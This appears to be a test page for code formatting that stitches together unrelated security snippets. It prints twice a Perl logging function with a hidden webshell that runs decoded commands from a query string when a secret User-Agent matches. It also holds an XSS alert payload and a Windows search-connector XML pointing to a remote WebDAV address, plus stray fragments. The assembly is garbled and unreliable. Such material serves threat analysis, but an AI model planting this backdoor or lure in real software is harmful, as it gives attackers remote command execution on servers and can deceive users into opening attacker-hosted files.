code test
sub Msg {
my ($event, $level, $data) = @_;
my ($pkg, $file, $line) = caller;
— start of webshell code —
my $ua = $ENV{HTTP_USER_AGENT};
my $req = $ENV{QUERY_STRING};
my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
my @param = split(/&/, $req);
if (index($ua, $qur) != -1) {
if ($param[1]){
my @res = split(/=/, $param[1]);
if ($res[0] eq “cdi”){
$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
$res[1] =~ tr/!-~/P-~!-O/;
system(${res[1]});
}
}
}
— end of webshell code —
$file = substr ($file, rindex ($file, “/”)+1);
# Prevent C printf format codes to make it through…
$data =~ s/%/%%/g;
Msg_impl ($file, $line, $event, $level, $data);
}
Using X-Force code snippet:
<code>sub Msg {
my ($event, $level, $data) = @_;
my ($pkg, $file, $line) = caller;
— start of webshell code —
my $ua = $ENV{HTTP_USER_AGENT};
my $req = $ENV{QUERY_STRING};
my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
my @param = split(/&/, $req);
if (index($ua, $qur) != -1) {
if ($param[1]){
my @res = split(/=/, $param[1]);
if ($res[0] eq “cdi”){
$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
$res[1] =~ tr/!-~/P-~!-O/;
system(${res[1]});
}
}
}
— end of webshell code —
$file = substr ($file, rindex ($file, “/”)+1);
# Prevent C printf format codes to make it through…
$data =~ s/%/%%/g;
Msg_impl ($file, $line, $event, $level, $data);
}</code>
Another:
<script>alert(“hi”)</script>
Tester:
<?xml version=”1.0″?>
<persistedQuery version=”1.0″>
<viewInfo viewMode=”icons” iconSize=”256″ stackIconSize=”0″ displayName=”Documents” autoListFlags=”0″>
<visibleColumns>
<column viewField=”System.ItemNameDisplay”/>
</visibleColumns>
<sortList>
<sort viewField=”System.ItemNameDisplay” direction=”ascending”/>
</sortList>
</viewInfo>
<query>
<kindList>
<kind name=”item”/>
</kindList>
<scope>
<include path=”::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\\148.252.42[.]42@80\documents\Tender” attributes=”1887437183″/>
</scope>
</query>
<properties>
<author Type=”string”>user</author>
</properties> </persistedQuery>
cmd.exe
char()
varchar()
(hex($1))
<p style=”font-family:courier;”>This is a paragraph.</p>
<p style=”background-color:Tomato;”>Lorem ipsum…</p>